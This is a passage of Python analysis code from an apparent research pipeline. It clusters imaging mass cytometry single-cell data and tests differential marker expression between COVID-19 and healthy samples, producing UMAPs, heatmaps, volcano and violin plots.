a2 = a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?"), :]
sc.pp.scale(a2)
sc.pp.pca(a2)
with parallel_backend("threading", n_jobs=12):
sc.pp.neighbors(a2, n_neighbors=15, use_rep="X_pca")
with parallel_backend("threading", n_jobs=12):
sc.tl.umap(a2, gamma=25)
# Replot projections
vmin = None
vmax = np.percentile(a2.raw.X, 99, axis=0).tolist()
color = (
a2.var.index.tolist()
+ ["area", "sample", "disease", "phenotypes"]
+ [f"metacluster_labels_{res}"]
)
for algo in args.algos:
# norm values
f = output_prefix + f"{algo}.filtered.z.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a2,
color=color,
show=False,
use_raw=False,
)
fig = axes[0].figure
        # only the final (metacluster) panel gets centroid labels here
        add_centroids(a2, res=res, ax=axes[-1])
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
# original values
f = output_prefix + f"{algo}.filtered.raw.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a2,
color=color,
show=False,
vmin=vmin,
vmax=vmax
+ [np.percentile(a2.obs["area"], 99)]
+ [None, None, None, None],
use_raw=True,
)
fig = axes[0].figure
        # only the final (metacluster) panel gets centroid labels here
        add_centroids(a2, res=res, ax=axes[-1])
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
# output_prefix = output_prefix.replace_(cur_date, f"{cur_date}.raw.")
output_prefix += "sample_zscore."
# Plot cluster phenotypes
res = 2.0
# # get mean per cluster
m = a2.to_df().groupby(a2.obs[f"metacluster_labels_{res}"]).mean()
# # get normalized proportions per disease group
annot = a2.obs.merge(consts.phenotypes.to_frame().reset_index())
ct = annot["phenotypes"].value_counts()
ct /= ct.sum()
c = annot.groupby([f"metacluster_labels_{res}", "phenotypes"]).size()
p = c.groupby(level=0).apply(lambda x: x / x.sum())
p = p.to_frame().pivot_table(
index=f"metacluster_labels_{res}", columns="phenotypes", values=0
)
p = np.log2(p / ct)
conf = "z"
grid = clustermap(m, row_colors=p, config=conf, figsize=(8, 3.4))
grid.fig.savefig(
output_prefix
+ f"phenotypes.filtered.metacluster_labels_{res}.clustermap.norm.{conf}.svg",
**consts.figkws,
)
def metacluster_expression(prj: Project) -> None:
(consts.output_dir / "phenotyping").mkdir()
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
quant_ff = output_prefix + "quantification.filtered.pq"
quant = pd.read_parquet(quant_ff)
# Drop unwanted channels and redundant morphological features
h5ad_f = output_prefix + "sample_zscore.h5ad"
a = sc.read(h5ad_f)
a.obs = a.obs.merge(consts.phenotypes.reset_index())
a.obs["disease"] = pd.Categorical(
a.obs["phenotypes"].str.split("_").apply(lambda x: x[0]).values,
categories=["Healthy", "COVID19"],
ordered=True,
)
res = 2.0
a.obs[f"cluster_labels_{res}"] = a.obs[f"cluster_{res}"].replace(
consts.cluster_idents[res]
)
a.obs[f"metacluster_labels_{res}"] = (
a.obs[f"cluster_labels_{res}"].str.extract(r"(.*) \(")[0].values
)
a.obs[f"cluster_labels_{res}"].value_counts().filter(regex=r"^[^\?]")
a.obs[f"metacluster_labels_{res}"].value_counts().filter(regex=r"^[^\?]")
h5ad_f = output_prefix + "sample_zscore.labeled.h5ad"
sc.write(h5ad_f, a)
# Cell type abundances
count = a.obs.groupby(["roi", f"cluster_labels_{res}"]).size()
total = a.obs.groupby(["roi"]).size()
area = pd.Series(
{roi.name: roi.area for roi in prj.rois}, name="area"
).rename_axis(index="roi")
# normalize by total or area
perc = ((count / total) * 100).rename("percentage")
exte = ((count / area) * 1e6).rename("absolute")
count_red = a.obs.groupby(["roi", f"metacluster_labels_{res}"]).size()
perc_red = ((count_red / total) * 100).rename("percentage")
exte_red = ((count_red / area) * 1e6).rename("absolute")
# get roi_attributes
roi_attributes = (
a.obs[["roi", "sample", "phenotypes", "disease"]]
.drop_duplicates()
.set_index("roi")
)
# Plot cluster abundance per disease group
_stats = list()
for group, ext in [("cluster", ""), ("metacluster", "_red")]:
for factor in ["disease", "phenotypes"]:
for name, dt in [("percentage", "perc"), ("absolute", "exte")]:
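                # look up the table computed above (perc/exte or perc_red/exte_red) by name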
df = locals()[dt + ext]
p = df.to_frame().pivot_table(
index="roi", columns=f"{group}_labels_{res}", values=name
)
kws = dict(
data=p.join(roi_attributes),
x=factor,
y=p.columns,
plot_kws=dict(palette=consts.colors[factor]),
)
fig, stats = swarmboxenplot(**kws)
_stats.append(
stats.assign(group=group, factor=factor, name=name)
)
fig.savefig(
output_prefix
+ f"phenotypes.{group}s.abundance.{name}.by_{factor}.swarmboxenplot.svg",
**consts.figkws,
)
stats = pd.concat(_stats)
stats.to_csv(
output_prefix + "abundance.differential_testing.csv", index=False
)
# Some single-cell heatmaps
a.obs.index = a.obs.index.astype(str)
a2 = a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?").values, :]
a2.X = z_score(a2.X.T).T
a2 = a2[:, ~a2.var.index.isin(consts.tech_channels)]
# Get clustered order for markers
marker_order = clustermap(
a2.to_df()
.groupby(a2.obs[f"metacluster_labels_{res}"].values)
.mean()
.corr()
).dendrogram_row.reordered_ind
fig = sc.pl.heatmap(
a2,
a2.var.index[marker_order],
groupby=f"metacluster_labels_{res}",
use_raw=False,
cmap="RdBu_r",
vmin=-6,
vmax=6,
show=False,
)["heatmap_ax"].figure
fig.savefig(
output_prefix + "phenotypes.metaclusters.expression.heatmap.svg",
**consts.figkws,
)
# ## same but by metacluster
# metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
# for metacluster in metaclusters:
# a3 = a2[a2.obs[f'metacluster_labels_{res}'] == metacluster, :]
# fig = sc.pl.heatmap(
# a3,
# functional_markers,
# groupby="phenotypes",
# use_raw=False,
# cmap="RdBu_r",
# vmin=-6,
# vmax=6,
# show=False,
# )["heatmap_ax"].figure
# fig.savefig(
# output_prefix + "phenotypes.metaclusters.expression.heatmap.svg",
# **consts.figkws,
# )
# Now aggregated by cluster
for factor in ["", "disease", "phenotypes"]:
groups = [f"metacluster_labels_{res}"] + (
[factor] if factor != "" else []
)
kws = dict(
adata=a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?"), :],
var_names=a.var.index[marker_order],
groupby=groups,
use_raw=False,
cmap="RdBu_r",
show=False,
vmin=-6,
vmax=6,
)
fig = sc.pl.matrixplot(
**kws,
)["mainplot_ax"].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.by_{factor}.heatmap.svg",
**consts.figkws,
)
fig = sc.pl.dotplot(**kws)["mainplot_ax"].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.by_{factor}.dotplot.svg",
**consts.figkws,
)
for factor in ["", "disease", "phenotypes"]:
groups = [f"metacluster_labels_{res}"] + (
[factor] if factor != "" else []
)
fig = sc.pl.stacked_violin(
a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?"), :],
a.var.index[marker_order],
groupby=groups,
use_raw=False,
show=False,
)["mainplot_ax"].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.by_{factor}.stacked_violinplot.svg",
**consts.figkws,
)
# Test for differential expression within each metacluster between disease groups
metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
a.obs["disease"] = a.obs["phenotypes"].str.split("_").apply(lambda x: x[0])
_diff_res = list()
for factor in ["phenotypes", "disease"]:
for metacluster in metaclusters:
a3 = a[a.obs[f"metacluster_labels_{res}"] == metacluster, :]
a3.X += abs(a3.X.min())
groups = a3.obs[factor].unique()[1:]
# sc.tl.rank_genes_groups(
# a3,
# factor,
# use_raw=False,
# reference="Healthy",
# # method="t-test_overestim_var",
# method="wilcoxon",
# )
sc.tl.rank_genes_groups(
a3,
factor,
use_raw=True,
reference="Healthy",
method="t-test_overestim_var",
# method="wilcoxon",
)
_diff_res.append(
pd.concat(
[
pd.DataFrame(
{
"marker": a3.uns["rank_genes_groups"]["names"][
group
],
"logfoldchanges": a3.uns["rank_genes_groups"][
"logfoldchanges"
][group],
"pvals": a3.uns["rank_genes_groups"]["pvals"][
group
],
"pvals_adj": a3.uns["rank_genes_groups"][
"pvals_adj"
][group],
}
).assign(
metacluster=metacluster, group=group, factor=factor
)
for group in groups
]
)
)
diff_res = pd.concat(_diff_res)
diff_res.to_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.csv"
)
# diff_res = pd.read_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.csv",
# index_col=0
# )
# # Test for differential expression within each metacluster between disease groups
# n_random = 25 # TODO: run with higher N
# a.obs["disease"] = a.obs["phenotypes"].str.split("_").apply(lambda x: x[0])
# metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
# _diff_res = list()
# for factor in ["phenotypes", "disease"]:
# for metacluster in metaclusters:
# a3 = a[a.obs[f"metacluster_labels_{res}"] == metacluster, :]
# a3.X += abs(a3.X.min())
# groups = a3.obs[factor].unique()[1:]
# n = a3.obs["sample"].value_counts().min()
# for i in range(n_random):
# cells = list()
# for sample in a3.obs["sample"].unique():
# cells += (
# a3.obs.query(f"sample == '{sample}'")
# .sample(n=n)
# .index.tolist()
# )
# a4 = a3[cells, :]
# sc.tl.rank_genes_groups(
# a4,
# factor,
# use_raw=False,
# reference="Healthy",
# method="t-test_overestim_var",
# # method="wilcoxon",
# )
# _diff_res.append(
# pd.concat(
# [
# pd.DataFrame(
# {
# "marker": a4.uns["rank_genes_groups"][
# "names"
# ][group],
# "logfoldchanges": a4.uns[
# "rank_genes_groups"
# ]["logfoldchanges"][group],
# "pvals": a4.uns["rank_genes_groups"][
# "pvals"
# ][group],
# "pvals_adj": a4.uns["rank_genes_groups"][
# "pvals_adj"
# ][group],
# }
# ).assign(
# metacluster=metacluster,
# group=group,
# factor=factor,
# iter=i,
# )
# for group in groups
# ]
# )
# )
# diff_res = pd.concat(_diff_res)
# diff_res.to_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.csv"
# )
# import scipy
# diff_res = (
# diff_res.groupby(["marker", "group", "factor", "metacluster"]).agg(
# {
# "logfoldchanges": np.mean,
# "pvals": lambda x: scipy.stats.combine_pvalues(x)[1],
# "pvals_adj": lambda x: scipy.stats.combine_pvalues(x)[1],
# }
# )
# # .drop("iter", 1)
# .reset_index()
# )
# # Simple mann-whitney
# metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
# a.obs["disease"] = a.obs["phenotypes"].str.split("_").apply(lambda x: x[0])
# _diff_res = list()
# for factor in ["phenotypes", "disease"]:
# for metacluster in metaclusters:
# a3 = a[a.obs[f"metacluster_labels_{res}"] == metacluster, :]
# # x = a3.to_df().join(a3.obs[['roi']]).groupby(['roi']).mean()[consts.functional_markers]
# x = a3.raw.to_adata().to_df().join(a3.obs[['roi']]).groupby(['roi']).mean()[consts.functional_markers]
# fig, stats = swarmboxenplot(data=x.join(roi_attributes), x=factor, y=x.columns)
# _diff_res.append(stats.assign(metacluster=metacluster, factor=factor))
# plt.close('all')
# diff_res = pd.concat(_diff_res)
# diff_res.to_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.raw.mannwhitney.csv"
# )
# diff_res.to_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.zscore.mannwhitney.csv"
# )
# # adapt to fit scanpy diff results
# diff_res = diff_res.rename(columns={'p-unc': 'pvals', 'p-cor': 'pvals_adj', 'hedges': 'logfoldchanges', "Variable": 'marker', "factor": "group"})
# diff_res['logfoldchanges'] *= -1
# diff_res = diff_res.loc[diff_res['A'] != 'Healthy']
# diff_res.loc[diff_res['group'] == 'disease', 'group'] = "COVID19"
# diff_res.loc[diff_res['group'] == 'phenotypes', 'group'] = diff_res.loc[diff_res['group'] == 'phenotypes', 'B']
diff_res = diff_res.dropna()
diff_res["-logp"] = -np.log10(diff_res["pvals"])
v = diff_res["-logp"].replace(np.inf, np.nan).dropna().max()
diff_res["-logp"] = diff_res["-logp"].replace(np.inf, v)
diff_res["marker_name"] = (
diff_res["marker"].str.split("(").apply(lambda x: x[0])
)
diff_res = diff_res.loc[diff_res["marker"].isin(consts.functional_markers)]
# Heatmap of log fold changes + pvalues
lfc = diff_res.pivot_table(
index=["metacluster", "group"],
columns="marker",
values="logfoldchanges",
).loc[:, consts.functional_markers]
p = diff_res.pivot_table(
index=["metacluster", "group"],
columns="marker",
values="pvals_adj",
).loc[:, consts.functional_markers]
    # significance mask for annotation (adjusted p < 0.05)
    sigs = p < 0.05
fig, ax = plt.subplots(figsize=(8, 6))
sns.heatmap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
# vmin=-10,
# vmax=10,
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
ax=ax,
)
for i, c in enumerate(ax.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
fig.savefig(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.joint_stats.heatmap.svg",
**consts.figkws,
)
    # Volcano plots
    # NOTE: this block assumes `diff_res` holds diffxpy-style columns
    # (pval, contrast, cell_type, gene, log2fc), i.e. the Wald-test output
    # written by differential_diffxpy() below, not the scanpy results above.
    diff_res["-logp"] = (-np.log10(diff_res["pval"])).replace(np.inf, 16)
diff_res = diff_res.rename(
columns={
"contrast": "group",
"cell_type": "metacluster",
"gene": "marker_name",
"log2fc": "logfoldchanges",
}
)
diff_res["group"] = (
diff_res["group"]
.replace("COVID19_all", "COVID19")
.replace("all", "COVID19")
)
diff_res["factor"] = "disease"
fig, axes = plt.subplots(
3,
3,
figsize=(4 * 2.7, 4 * 2.7),
sharex=False,
sharey=False,
gridspec_kw=dict(hspace=0.5, wspace=0.5),
)
for ax in axes.flat:
ax.axvline(0, linestyle="--", color="grey")
ax.axhline(5, linestyle="--", color="grey", linewidth=0.3)
for metacluster, ax in zip(metaclusters, axes.flat):
p = diff_res.query(
f"metacluster == '{metacluster}' & group == 'COVID19' & factor == 'disease'"
)
v = p["logfoldchanges"].abs().max()
v += v * 0.1
ax.scatter(
p["logfoldchanges"],
p["-logp"],
s=10,
alpha=0.5,
c=p["logfoldchanges"],
cmap="coolwarm",
vmin=-v,
vmax=v,
)
ax.set(title=metacluster)
top = (
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
)
for x in top.tail(5).index:
ha = "right" if p.loc[x, "logfoldchanges"] < 0 else "left"
ax.text(
p.loc[x, "logfoldchanges"],
p.loc[x, "-logp"],
s=p.loc[x, "marker_name"],
ha=ha,
)
ax.set(xlim=(-v, v))
axes[2][-1].set_visible(False)
axes[1][0].set(ylabel="-log(p-value)")
axes[-1][1].set(xlabel="log(fold-change)")
axes[0][1].set_title("COVID19 vs Healthy\n" + axes[0][1].get_title())
fig.savefig(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.volcano_plots.disease.svg",
**consts.figkws,
)
fig, axes = plt.subplots(
3 * 2,
3,
figsize=(4 * 2.7, 4 * 2.7 * 2),
sharex=False,
sharey=False,
gridspec_kw=dict(hspace=0.5, wspace=0.5),
)
for ax in axes.flat:
ax.axvline(0, linestyle="--", color="grey")
ax.axhline(5, linestyle="--", color="grey", linewidth=0.3)
for metacluster, ax in zip(metaclusters, axes[:3].flat):
        # `factor` is uniformly "disease" at this point, so filter on group only
        p = diff_res.query(
            f"metacluster == '{metacluster}' & group == 'COVID19_early'"
        )
v = p["logfoldchanges"].abs().max()
v += v * 0.1
ax.scatter(
p["logfoldchanges"],
p["-logp"],
s=10,
alpha=0.5,
c=p["logfoldchanges"],
cmap="coolwarm",
vmin=-v,
vmax=v,
)
ax.set(title=metacluster)
top = (
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
)
for x in top.tail(5).index:
ha = "right" if p.loc[x, "logfoldchanges"] < 0 else "left"
ax.text(
p.loc[x, "logfoldchanges"],
p.loc[x, "-logp"],
s=p.loc[x, "marker_name"],
ha=ha,
)
ax.set(xlim=(-v, v))
axes[2][-1].set_visible(False)
for metacluster, ax in zip(metaclusters, axes[3:].flat):
p = diff_res.query(
f"metacluster == '{metacluster}' & group == 'COVID19_late'"
)
v = p["logfoldchanges"].abs().max()
v += v * 0.1
ax.scatter(
p["logfoldchanges"],
p["-logp"],
s=10,
alpha=0.5,
c=p["logfoldchanges"],
cmap="coolwarm",
vmin=-v,
vmax=v,
)
ax.set(title=metacluster)
top = (
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
)
for x in top.tail(5).index:
ha = "right" if p.loc[x, "logfoldchanges"] < 0 else "left"
ax.text(
p.loc[x, "logfoldchanges"],
p.loc[x, "-logp"],
s=p.loc[x, "marker"],
ha=ha,
)
ax.set(xlim=(-v, v))
axes[-1][-1].set_visible(False)
axes[1][0].set(ylabel="-log(p-value)")
axes[-2][0].set(ylabel="-log(p-value)")
axes[-1][1].set(xlabel="log(fold-change)")
axes[0][1].set_title("COVID19_early vs Healthy\n" + axes[0][1].get_title())
axes[-3][1].set_title("COVID19_late vs Healthy\n" + axes[-3][1].get_title())
fig.savefig(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.volcano_plots.phenotypes.svg",
**consts.figkws,
)
# Violinplots
diff_res = pd.read_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.csv",
index_col=0,
)
# diff_res = (
# diff_res.groupby(["marker", "group", "factor", "metacluster"])
# .mean()
# .drop("iter", 1)
# .reset_index()
# )
diff_res = diff_res.dropna()
diff_res["-logp"] = -np.log10(diff_res["pvals"])
v = diff_res["-logp"].replace(np.inf, np.nan).dropna().max()
diff_res["-logp"] = diff_res["-logp"].replace(np.inf, v)
metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
for metacluster in metaclusters:
for factor in ["disease", "phenotypes"]:
a3 = a2[a2.obs[f"metacluster_labels_{res}"] == metacluster, :]
a3.obs[factor] = pd.Categorical(
a3.obs[factor],
categories=a2.obs[factor].cat.categories,
ordered=True,
)
kws = dict(
groupby=factor,
use_raw=True,
stripplot=False,
multi_panel=True,
order=a3.obs[factor].cat.categories,
show=False,
)
fig = sc.pl.violin(a3, a3.var.index, **kws)[0].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.{metacluster}.{factor}.violinplots.svg",
**consts.figkws,
)
for group in a3.obs[factor].cat.categories[1:]:
p = diff_res.query(
f"metacluster == '{metacluster}' & group == '{group}'"
)
p = p.loc[p["marker"].isin(consts.functional_markers), :]
top = p.loc[
(
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
.tail(3)
.index
),
"marker",
][::-1]
fig = sc.pl.violin(a3, top, **kws)[0].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.{metacluster.replace(' ', '')}.{factor}.violinplots.top_diff_{group}.svg",
**consts.figkws,
)
def differential_diffxpy(prj) -> None:
import diffxpy.api as de
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
# load cell types from h5ad
h5ad_f = (
consts.output_dir / "phenotyping" / prj.name
+ "."
+ "sample_zscore.labeled.h5ad"
)
a = sc.read(h5ad_f).raw.to_adata()
_diff_res = list()
for group in ["all", "COVID19_early", "COVID19_late", "between"]:
if group == "all":
a2 = a.copy()
elif group == "between":
a2 = a[~a.obs["phenotypes"].isin(["Healthy"])]
a2.obs["phenotypes"] = a2.obs[
"phenotypes"
].cat.remove_unused_categories()
else:
a2 = a[a.obs["phenotypes"].isin(["Healthy", group])]
a2.obs["phenotypes"] = a2.obs[
"phenotypes"
].cat.remove_unused_categories()
a2.obs["p"] = a2.obs["phenotypes"].cat.codes
part = de.test.partition(data=a2, parts="metacluster_labels_2.0")
test_part = part.wald(formula_loc="~ 1 + p", factor_loc_totest="p")
diff_res = pd.concat(
[
r.summary().assign(cell_type=n)
for n, r in zip(test_part.partitions, test_part.tests)
]
).assign(contrast=group)
_diff_res.append(diff_res)
diff_res = pd.concat(_diff_res)
diff_res.to_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.raw_values.wald.csv"
)
diff_res = pd.read_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.raw_values.wald.csv",
index_col=0,
)
diff_res = diff_res.loc[
diff_res["contrast"].isin(["all", "COVID19_early", "COVID19_late"])
]
diff_res["contrast"] = diff_res["contrast"].replace("all", "COVID19_all")
diff_res["gene"] = [x.split("(")[0] for x in diff_res["gene"]]
funct = [x.split("(")[0] for x in consts.functional_markers]
lfc = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="gene",
values="log2fc",
).loc[:, funct]
p = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="gene",
values="pval",
).loc[:, funct]
padj = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="gene",
values="qval",
).loc[:, funct]
sigs = padj < 1e-25
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
# col_colors=np.log1p(a.to_df()[funct].mean())
# .rename("Channel mean")
# .clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.joint_stats.heatmap.joint.svg",
**consts.figkws,
)
grid = clustermap(
lfc.loc[:, "COVID19_all", :],
annot=sigs.loc[:, "COVID19_all", :],
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
# col_colors=np.log1p(a.to_df()[funct].mean())
# .rename("Channel mean")
# .clip(0, 1),
figsize=(6, 4),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.joint_stats.heatmap.joint.both.svg",
**consts.figkws,
)
for group in ["all", "COVID19_early", "COVID19_late", "between"]:
diff = diff_res.query(f"contrast == '{group}'")
# Heatmap of log fold changes + pvalues
lfc = diff.pivot_table(
index=["cell_type"],
columns="gene",
values="log2fc",
).loc[:, consts.functional_markers]
p = diff.pivot_table(
index=["cell_type"],
columns="gene",
values="pval",
).loc[:, consts.functional_markers]
padj = diff.pivot_table(
index=["cell_type"],
columns="gene",
values="qval",
).loc[:, consts.functional_markers]
sigs = padj < 1e-10
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
col_colors=np.log1p(a.to_df()[consts.functional_markers].mean())
.rename("Channel mean")
.clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.joint_stats.heatmap.{group}.svg",
**consts.figkws,
)
# with statsmodels
import statsmodels.formula.api as smf
import pingouin as pg
df = a.to_df().join(a.obs[["phenotypes", "metacluster_labels_2.0"]])
_res = list()
for ct in a.obs["metacluster_labels_2.0"].unique():
df2 = df.loc[
df["metacluster_labels_2.0"] == ct,
consts.functional_markers + ["phenotypes"],
]
df2.columns = [x.split("(")[0] for x in df2.columns]
for m in df2.columns.drop(["phenotypes"]):
res = smf.ols(f"{m} ~ phenotypes", df2).fit()
_res.append(
pd.DataFrame(
{
"coef": res.params,
"p-value": res.pvalues,
"marker": m,
"cell_type": ct,
}
)
)
diff_res = pd.concat(_res).drop("Intercept").rename_axis("contrast")
diff_res["qval"] = pg.multicomp(diff_res["p-value"].values, method="bonf")[
1
]
funct = [x.split("(")[0] for x in consts.functional_markers]
lfc = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="coef",
).loc[:, funct]
p = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="p-value",
).loc[:, funct]
padj = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="qval",
).loc[:, funct]
sigs = padj < 1e-25
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
col_colors=np.log1p(a.to_df()[consts.functional_markers].mean())
.rename("Channel mean")
.clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.statsmodels.heatmap.joint.svg",
**consts.figkws,
)
# Pseudobulk approach
df = (
a.to_df()
.join(a.obs[["phenotypes", "roi", "metacluster_labels_2.0"]])
.groupby(["phenotypes", "roi", "metacluster_labels_2.0"])
.mean()
.reset_index()
)
_res = list()
for ct in a.obs["metacluster_labels_2.0"].unique():
df2 = df.loc[
df["metacluster_labels_2.0"] == ct,
consts.functional_markers + ["phenotypes"],
]
df2.columns = [x.split("(")[0] for x in df2.columns]
for m in df2.columns.drop(["phenotypes"]):
res = smf.ols(f"{m} ~ phenotypes", df2).fit()
_res.append(
pd.DataFrame(
{
"coef": res.params,
"p-value": res.pvalues,
"marker": m,
"cell_type": ct,
}
)
)
diff_res = pd.concat(_res).drop("Intercept").rename_axis("contrast")
diff_res["qval"] = pg.multicomp(diff_res["p-value"].values, method="bonf")[
1
]
funct = [x.split("(")[0] for x in consts.functional_markers]
lfc = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="coef",
).loc[:, funct]
p = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="p-value",
).loc[:, funct]
padj = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="qval",
).loc[:, funct]
sigs = padj < 0.05
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
col_colors=np.log1p(a.to_df()[consts.functional_markers].mean())
.rename("Channel mean")
.clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.statsmodels_pseudobulk.heatmap.joint.svg",
**consts.figkws,
)
def threshold_positiveness(prj: Project) -> None:
import yaml
from imc.operations import (
get_best_mixture_number,
get_threshold_from_gaussian_mixture,
)
(consts.output_dir / "gating").mkdir()
# load quantification
prefix = consts.output_dir / "phenotyping" / prj.name + "."
quant_ff = prefix + "quantification.filtered.pq"
quant = pd.read_parquet(quant_ff)
ids = ["sample", "roi"]
quant = pd.concat([np.log1p(quant.drop(ids, axis=1)), quant[ids]], axis=1)
# load cell types from h5ad
h5ad_f = (
consts.output_dir / "phenotyping" / prj.name
+ "."
+ "sample_zscore.labeled.h5ad"
)
a = sc.read(h5ad_f)
# remove excluded channels
exc = prj.rois[0].channel_exclude[prj.rois[0].channel_exclude].index
quant = quant.drop(exc, axis=1, errors="ignore")
# # Univariate gating of each channel per sample
# thresholds_file = consts.output_dir / "thresholds.activation.json"
# mixes_file = consts.output_dir / "mixes.activation.json"
# if not (thresholds_file.exists() and thresholds_file.exists()):
# mixes = dict()
# thresholds = dict()
# for m in quant.columns.drop(ids):
# if m not in thresholds:
# mixes[m] = get_best_mixture_number(quant[m], 2, 8)
# thresholds[m] = get_threshold_from_gaussian_mixture(
# quant[m], None, mixes[m]
# ).to_dict()
# json.dump(thresholds, open(thresholds_file, "w"), indent=4)
# json.dump(mixes, open(mixes_file, "w"), indent=4)
# thresholds = json.load(open(thresholds_file))
# mixes = json.load(open(mixes_file))
# # Make dataframe with population for each marker
# gating_file = consts.output_dir / "gating" / "positive.pq"
# if not gating_file.exists():
# pos = pd.DataFrame(index=quant.index, columns=consts.functional_markers)
# for m in consts.functional_markers:
# name = m.split("(")[0]
# o = sorted(thresholds[m])
# if mixes[m] == 2:
# pos[m] = quant[m] > thresholds[m][o[0]]
# else:
# pos[m] = quant[m] > thresholds[m][o[-1]]
# sel = pos[m] == False
# pos.loc[sel, m] = quant.loc[sel, m] > thresholds[m][o[-2]]
# pos = pd.concat([pos, quant[ids]], axis=1)
# pos.to_parquet(gating_file)
# pos = pd.read_parquet(gating_file)
# pos.index.name = "obj_id"
# # Univariate gating of each channel (per sample)
# thresholds_file = (
# consts.output_dir / "thresholds.activation.per_sample.yaml"
# )
# mixes_file = consts.output_dir / "mixes.activation.per_sample.yaml"
# if not (thresholds_file.exists() and thresholds_file.exists()):
# mixes = dict()
# thresholds = dict()
# for m in consts.functional_markers:
# for s in quant["sample"].unique():
# if (m, s) not in thresholds:
# y = quant.query(f"sample == '{s}'")
